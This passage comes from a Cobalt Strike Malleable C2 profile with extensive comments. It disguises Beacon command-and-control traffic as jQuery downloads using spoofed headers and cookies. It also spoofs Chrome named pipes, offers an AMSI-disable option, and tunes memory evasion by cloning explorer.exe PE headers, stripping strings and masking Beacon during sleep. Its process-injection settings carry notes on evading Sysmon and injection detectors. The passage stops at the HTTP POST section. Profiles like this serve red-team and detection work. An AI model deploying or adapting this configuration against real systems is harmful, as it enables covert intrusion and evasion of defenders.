130 | ##    -   "csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe"
131 | ##    - A binary that executes without the UAC
132 | ##    - 64 bit for x64
133 | ##    - 32 bit for x86
134 | ##    - You can add command line parameters to blend
135 | ##      - set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs";
136 | ##      - set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs";
137 | ##      - Note: svchost.exe may look weird as the parent process 
138 | ##    - The obfuscate option scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way. It’s very similar to the obfuscate and userwx options available for Beacon via the stage block.
139 | ##    - The amsi_disable option directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities.
140 | ##    - The smartinject option directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. This allows post-ex DLLs to bootstrap themselves in a new process without shellcode-like behavior that is detected and mitigated by watching memory accesses to the PEB and kernel32.dll
141 | 
142 | # post-ex {
143 |     # Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes
144 |     #set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
145 |     # Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon.
146 |     #set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
147 |     # change the permissions and content of our post-ex DLLs
148 |     #set obfuscate "true";
149 |     # pass key function pointers from Beacon to its child jobs
150 |     #set smartinject "true";
151 |     # disable AMSI in powerpick, execute-assembly, and psinject
152 |     # set amsi_disable "true";
153 | # }
154 | 
155 | ################################################
156 | ## TCP Beacon
157 | ################################################
158 | ## Description:
159 | ##    TCP Beacon listen port
160 | ##     - https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
161 | ##     - https://www.cobaltstrike.com/help-tcp-beacon
162 | ## Defaults:
163 | ##    tcp_port: 4444
164 | ## Guidelines
165 | ##    - OPSEC WARNING!!!!! The default port is 4444. This is bad. You can change dynamicaly but the port set in the profile will always be used first before switching to the dynamic port.
166 | ##    - Use a port other that default. Choose something not is use.
167 | ##    - Use a port greater than 1024 is generally a good idea
168 | set tcp_port "12563";
169 | 
170 | ################################################
171 | ## SMB beacons
172 | ################################################
173 | ## Description:
174 | ##    Peer-to-peer beacon using SMB for communication
175 | ## Defaults:
176 | ##    pipename: msagent_##
177 | ##    pipename_stager: status_##
178 | ## Guidelines:
179 | ##    - Do not use an existing namedpipe, Beacon doesn't check for conflict!
180 | ##    - the ## is replaced with a number unique to a teamserver     
181 | ## ---------------------
182 | set pipename         "mojo.5688.8052.18389493978708####"; # Common Chrome named pipe
183 | set pipename_stager  "mojo.5688.8052.3578027332937####"; # Common Chrome named pipe
184 | 
185 | ################################################
186 | ## DNS beacons
187 | ################################################
188 | ## Description:
189 | ##    Beacon that uses DNS for communication
190 | ## Defaults:
191 | ##    maxdns: 255
192 | ##    dns_idle: 0.0.0.0
193 | ##    dns_max_txt: 252
194 | ##    dns_sleep: 0
195 | ##    dns_stager_prepend: N/A
196 | ##    dns_stager_subhost: .stage.123456.
197 | ##    dns_ttl: 1
198 | ## Guidelines:
199 | ##    - DNS beacons generate a lot of DNS request. DNS beacon are best used as low and slow back up C2 channels
200 | ##set maxdns          "255";
201 | ##set dns_max_txt     "252";
202 | ##set dns_idle        "74.125.196.113"; #google.com (change this to match your campaign)
203 | ##set dns_sleep       "0"; #    Force a sleep prior to each individual DNS request. (in milliseconds)
204 | ##set dns_stager_prepend ".resources.123456.";
205 | ##set dns_stager_subhost ".feeds.123456.";
206 | 
207 | ################################################
208 | ## Staging process
209 | ################################################
210 | ## OPSEC WARNING!!!! Staging has serious OPSEC issues. It is recommed to disable staging and use stageless payloads
211 | ## Description:
212 | ##    Malleable C2's http-stager block customizes the HTTP staging process
213 | ## Defaults:
214 | ##    uri_x86 Random String
215 | ##    uri_x64 Random String
216 | ##    HTTP Server Headers - Basic HTTP Headers
217 | ##    HTTP Client Headers - Basic HTTP Headers
218 | ## Guidelines:
219 | ##    - Add customize HTTP headers to the HTTP traffic of your campaign
220 | ##    - Only specify the `Host` header when peforming domain fronting. Be aware of HTTP proxy's rewriting your request per RFC2616 Section 14.23
221 | ##      - https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/
222 | ##    - Note: Data transform language not supported in http stageing (mask, base64, base64url, etc)
223 | 
224 | set host_stage "false"; # Do not use staging. Must use stagles payloads
225 | #set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set
226 | 
227 | http-stager {  
228 |     set uri_x86 "/jquery-3.3.1.slim.min.js";
229 |     set uri_x64 "/jquery-3.3.2.slim.min.js";
230 | 
231 |     server {
232 |         header "Server" "NetDNA-cache/2.2";
233 |         header "Cache-Control" "max-age=0, no-cache";
234 |         header "Pragma" "no-cache";
235 |         header "Connection" "keep-alive";
236 |         header "Content-Type" "application/javascript; charset=utf-8";
237 |         output {
238 |             ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
239 |             # 2nd Line            
240 |             prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
241 |             # 1st Line
242 |             prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
243 |             append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
244 |             print;
245 |         }
246 |     }
247 | 
248 |     client {
249 |         header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
250 |         header "Accept-Language" "en-US,en;q=0.5";
251 |         #header "Host" "code.jquery.com";
252 |         header "Referer" "http://code.jquery.com/";
253 |         header "Accept-Encoding" "gzip, deflate";
254 |     }
255 | }
256 | 
257 | ################################################
258 | ## Memory Indicators
259 | ################################################
260 | ## Description:
261 | ##    The stage block in Malleable C2 profiles controls how Beacon is loaded into memory and edit the content of the Beacon DLL.
262 | ## Values:
263 | ##    checksum      	0	The CheckSum value in Beacon's PE header
264 | ##    cleanup           false	Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it.
265 | ##    compile_time	    14 July 2009 8:14:00	The build time in Beacon's PE header
266 | ##    entry_point	    92145	The EntryPoint value in Beacon's PE header
267 | ##    image_size_x64	512000	SizeOfImage value in x64 Beacon's PE header
268 | ##    image_size_x86	512000	SizeOfImage value in x86 Beacon's PE header
269 | ##    module_x64	    xpsservices.dll	Same as module_x86; affects x64 loader
270 | ##    module_x86	    xpsservices.dll	Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc.
271 | ##    name	            beacon.x64.dll	The Exported name of the Beacon DLL
272 | ##    obfuscate	        false	Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers.
273 | ##    rich_header		N/A     Meta-information inserted by the compiler
274 | ##    sleep_mask        false   Obfuscate Beacon (HTTP, SMB, TCP Beacons), in-memory, prior to sleeping (HTTP) or waiting for a new connection\data (SMB\TCP)
275 | ##    stomppe	        true	Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload
276 | ##    userwx	        false	Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory
277 | ## Guidelines:
278 | ##    - Modify the indicators to minimize in memory indicators
279 | #     - Refer to 
280 | ##       https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/
281 | ##       https://www.youtube.com/playlist?list=PL9HO6M_MU2nc5Q31qd2CwpZ8J4KFMhgnK
282 | ##       https://www.youtube.com/watch?v=AV4XjxYe4GM (Obfuscate and Sleep)
283 | stage {
284 |     set userwx         "false"; 
285 |     set stomppe        "true";
286 |     set obfuscate      "true";
287 |     set name           "srv.dll";
288 |     set cleanup        "true";
289 |     # CS 3.12 Addition "Obfuscate and Sleep"
290 |     set sleep_mask     "true";
291 | 
292 |     # Values captured using peclone agaist a Windows 10 version of explorer.exe
293 |     set checksum       "0";
294 | 	set compile_time   "11 Nov 2016 04:08:32";
295 | 	set entry_point    "650688";
296 | 	set image_size_x86 "4661248";
297 | 	set image_size_x64 "4661248";
298 | 	set rich_header    "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
299 | 
300 |     ## WARNING: Module stomping 
301 |     # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.
302 |     # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.
303 |     # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.
304 |     # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.
305 |     # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4
306 | 
307 |     # set module_x64 "netshell.dll";
308 |     # set module_x86 "netshell.dll";
309 | 
310 |     # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
311 |     transform-x86 { # transform the x86 rDLL stage
312 |         prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
313 |         strrep "ReflectiveLoader" "execute"; # Change this text
314 |         strrep "This program cannot be run in DOS mode" ""; # Remove this text
315 |         strrep "beacon.dll" ""; # Remove this text
316 |     }
317 |     transform-x64 { # transform the x64 rDLL stage
318 |         prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
319 |         strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL
320 |         strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL
321 |     }
322 | 
323 |     stringw "jQuery"; # Add this string to the DLL
324 | }
325 | 
326 | ################################################
327 | ## Process Injection
328 | ################################################
329 | ## Description:
330 | ##    The process-inject block in Malleable C2 profiles shapes injected content and controls process injection behavior.
331 | ## Values:
332 | ##    allocator         VirtualAllocEx  The preferred method to allocate memory in the remote process. Specify VirtualAllocEx or NtMapViewOfSection. The NtMapViewOfSection option is for same-architecture injection only. VirtualAllocEx is always used for cross-arch memory allocations.
333 | ##    min_alloc         4096    Minimum amount of memory to request for injected content.
334 | ##    startrwx          false   Use RWX as initial permissions for injected content. Alternative is RW.
335 | ##    userwx            false   Use RWX as final permissions for injected content. Alternative is RX.
336 | ## 
337 | ## Use the transform-x86\x64 to pad content injected by Beacon
338 | ## Use the execute block to control use of Beacon's process injection techniques
339 | ## Guidelines:
340 | ##    - Modify the indicators to minimize in memory indicators
341 | #     - Refer to 
342 | ##       https://www.cobaltstrike.com/help-malleable-c2#processinject
343 | ##       https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/
344 | 
345 | process-inject {
346 | 
347 |     # set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection
348 |     set allocator "NtMapViewOfSection";
349 | 
350 |     # Minimium memory allocation size when injecting content
351 |     set min_alloc "17500";
352 | 
353 |     # Set memory permissions as permissions as initial=RWX, final=RX
354 |     set startrwx "false";
355 |     set userwx   "false";
356 | 
357 |     # Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append.
358 |     transform-x86 {
359 |         prepend "\x90\x90";
360 |         #append "\x90\x90";
361 |     }
362 | 
363 |     transform-x64 {
364 |         prepend "\x90\x90";
365 |         #append "\x90\x90";
366 |     }
367 |   
368 |     ## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include:
369 |     #
370 |     # Name                      x86->x64    x64-x86     Notes
371 |     #########################################################################
372 |     # CreateThread                                      Current Process only
373 |     # CreateRemoteThread                       Yes      No cross-session
374 |     # NtQueueApcThread                                  
375 |     # NtQueAPCThread-s                                  This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only.
376 |     # RtlCreateUserThread           Yes        Yes      Risky on XP-era targets; uses RWX shellcode for x86->x64 injection.
377 |     # SetThreadContext                         Yes      Suspended processes (e.g. post-ex jobs only)
378 |     execute {
379 | 
380 |         # The order is important! Each step will be attempted (if applicable) until successful
381 |         ## self-injection
382 |         CreateThread "ntdll!RtlUserThreadStart+0x42";
383 |         CreateThread;
384 | 
385 |         ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s)
386 |         # OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process.
387 |         # SetThreadContext;
388 |         NtQueueApcThread-s;
389 |         
390 |         ## Injection into existing processes
391 |         # OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products.
392 |         #NtQueueApcThread; 
393 |         
394 |         # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries
395 |         # OPSEC - fires Sysmon Event 8
396 |         CreateRemoteThread;
397 |         
398 |         # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries
399 |         # OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread
400 |         RtlCreateUserThread; 
401 |     }
402 | }
403 | 
404 | 
405 | ################################################
406 | ## HTTP Headers
407 | ################################################
408 | ## Description:
409 | ##    The http-config block has influence over all HTTP responses served by Cobalt Strike’s web server. Here, you may specify additional HTTP headers and the HTTP header order.
410 | ## Values:
411 | ##    set headers                   "Comma separated list of headers"    The set headers option specifies the order these HTTP headers are delivered in an HTTP response. Any headers not in this list are added to the end.
412 | ##    header                        "headername" "header alue            The header keyword adds a header value to each of Cobalt Strike's HTTP responses. If the header value is already defined in a response, this value is ignored.
413 | ##    set trust_x_forwarded_for     "true"                               Adds this header to determine remote address of a request.
414 | ## Guidelines:
415 | ##    - Use this section in addition to the "server" secion in http-get and http-post to further define the HTTP headers 
416 | 
417 | http-config {
418 |     set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
419 |     header "Server" "Apache";
420 |     header "Keep-Alive" "timeout=10, max=100";
421 |     header "Connection" "Keep-Alive";
422 |     # Use this option if your teamserver is behind a redirector
423 |     set trust_x_forwarded_for "true";
424 | }
425 | 
426 | ################################################
427 | ## HTTP GET
428 | ################################################
429 | ## Description:
430 | ##    GET is used to poll teamserver for tasks
431 | ## Defaults:
432 | ##    uri "/activity"
433 | ##    Headers (Sample)
434 | ##      Accept: */*
435 | ##      Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
436 | ##      User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
437 | ## Guidelines:
438 | ##    - Add customize HTTP headers to the HTTP traffic of your campaign
439 | ##    - Analyze sample HTTP traffic to use as a reference
440 | ##    - Multiple URIs can be added. Beacon will randomly pick from these.
441 | ##      - Use spaces as a URI seperator
442 | http-get {
443 | 
444 |     set uri "/jquery-3.3.1.min.js";
445 |     set verb "GET";
446 | 
447 |     client {
448 | 
449 |         header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
450 |         #header "Host" "code.jquery.com";
451 |         header "Referer" "http://code.jquery.com/";
452 |         header "Accept-Encoding" "gzip, deflate";
453 | 
454 |         metadata {
455 |             mask;
456 | 	    base64url;
457 |             prepend "__cfduid=";
458 |             header "Cookie";
459 |         }
460 |     }
461 | 
462 |     server {
463 | 
464 |         header "Server" "NetDNA-cache/2.2";
465 |         header "Cache-Control" "max-age=0, no-cache";
466 |         header "Pragma" "no-cache";
467 |         header "Connection" "keep-alive";
468 |         header "Content-Type" "application/javascript; charset=utf-8";
469 | 
470 |         output {   
471 |             mask;
472 |             base64url;
473 |             ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
474 |             # 2nd Line            
475 |             prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
476 |             # 1st Line
477 |             prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
478 |             append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
479 |             print;
480 |         }
481 |     }
482 | }
483 | 
484 | ################################################
485 | ## HTTP POST
486 | ################################################
487 | ## Description:
488 | ##    POST is used to send output to the teamserver
489 | ##    Can use HTTP GET or POST to send data
